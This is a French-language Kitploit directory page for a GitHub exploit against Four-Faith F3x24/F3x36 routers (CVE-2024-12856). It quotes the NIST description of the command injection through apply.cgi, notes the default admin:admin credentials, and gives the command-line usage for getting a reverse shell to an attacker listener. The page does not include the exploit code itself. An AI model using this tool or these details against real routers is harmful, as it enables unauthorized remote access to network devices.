Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-12856 — Un exploit pour les routeurs Four-Faith afin d'obtenir un reverse shell. | Kitploit
Outils/GitHubGitHub/nu113d/cve-2024-12856
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubnu113d/cve-2024-12856

CVE-2024-12856

Un exploit pour les routeurs Four-Faith afin d'obtenir un reverse shell.

Voir le dépôt
317il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-12856

Il s'agit d'un exploit pour les routeurs Four-Faith des modèles F3x24 et F3x36 permettant d'obtenir un shell inversé.

« Les routeurs Four-Faith des modèles F3x24 et F3x36 sont affectés par une vulnérabilité d'injection de commandes dans le système d'exploitation (OS). Au moins la version 2.0 du firmware permet à des attaquants authentifiés et distants d'exécuter des commandes OS arbitraires via HTTP lors de la modification de l'heure système via apply.cgi. De plus, cette version du firmware possède des identifiants par défaut qui, s'ils ne sont pas modifiés, transformeraient effectivement cette vulnérabilité en un problème d'exécution de commandes OS à distance sans authentification. »

Source : nist.gov

Ce script est basé sur une charge utile observée par VulnCheck

Comment l'utiliser

Avant d'exécuter l'exploit, démarrez un serveur TCP sur votre machine.
Ensuite, exécutez

python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT

Où

  • RHOST est l'adresse IP distante. Vous pouvez également ajouter un domaine.
  • LHOST est l'IP de votre serveur TCP sur votre machine.
  • LPORT est le port de votre serveur TCP.
  • USERNAME et PASSWORD sont les identifiants du routeur. La valeur par défaut est admin:admin.
  • RPORT est le port distant du routeur. La valeur par défaut est 80.

Avertissement

Assurez-vous d'utiliser cet exploit uniquement pour des tests et dans des environnements autorisés.

Ne l'utilisez jamais à des fins malveillantes.

Télécharger l’outil